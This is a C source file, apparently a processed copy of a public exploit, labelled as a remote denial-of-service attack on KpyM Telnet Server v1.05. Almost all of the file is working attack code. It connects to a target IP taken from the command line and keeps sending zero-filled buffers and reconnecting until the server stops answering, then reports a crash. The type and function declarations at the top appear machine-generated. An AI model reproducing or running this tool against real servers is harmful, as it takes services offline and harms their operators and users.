
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef int u_short ;
typedef int u_char ;
struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_family; int sin_port; } ;
struct sockaddr {int dummy; } ;
typedef int peer ;
typedef int WSADATA ;


 int AF_INET ;
 int BUFFSZ ;
 int IPPROTO_TCP ;
 int MAKEWORD (int,int ) ;
 int PORT ;
 int SOCK_STREAM ;
 int WSAStartup (int ,int *) ;
 int close (int) ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 int fputs (char*,int ) ;
 int htons (int ) ;
 char* inet_ntoa (TYPE_1__) ;
 int * malloc (int ) ;
 int memset (int *,int ,int ) ;
 int printf (char*,...) ;
 int recv (int,int *,int ,int ) ;
 int resolv (char*) ;
 int send (int,int *,int ,int ) ;
 int setbuf (int ,int *) ;
 int socket (int ,int ,int ) ;
 int stdout ;

int main(int argc, char *argv[]) {
    u_char *buff;
    struct sockaddr_in peer;
    int sd, err;
    u_short port = PORT;


    setbuf(stdout, ((void*)0));

    fputs("\n"
        "KpyM Telnet Server v1.05 remote DoS\n"
        "by NoRpiUs\n"
        "e-mail: norpius@altervista.org\n"
        "web:    http://norpius.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\nUso: %s <ip>\n\n",argv[0]);
        exit(1);
    }
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port = htons(port);
    peer.sin_family = AF_INET;


    buff = malloc(BUFFSZ);
    if(!buff)
    {
          fputs("[-] Can't allocate buffer\n", stdout);
          exit(0);
    }


    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0)
    {
          fputs("[-] Can't create socket\n", stdout);
          exit(0);
    }

    printf("\n[+] Connecting to %s:%hu...\n",
        inet_ntoa(peer.sin_addr), port);
    err = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
    if(err < 0)
    {
          fputs("[-] Can't connect\n", stdout);
          exit(0);
    }

    err = recv(sd, buff, BUFFSZ, 0);
    if(err < 0)
    {
          fputs("[-] No response from the server", stdout);
          exit(0);
    }

    memset(buff, 0, BUFFSZ);

    fputs("[+] Waiting for the crash.. ", stdout);

    while(1)
    {
       err = send(sd, buff, BUFFSZ, 0);
       if(err < 0)
       {
          fputs("[-] Can't send\n", stdout);
          exit(0);
       }
       printf(".");
       close(sd);
       sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
       err = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
       if ( err < 0 )
       {
           fputs("\n[+] Crashed\n\r", stdout);
           exit(0);
       }
    }

    close(sd);
    return(0);
}
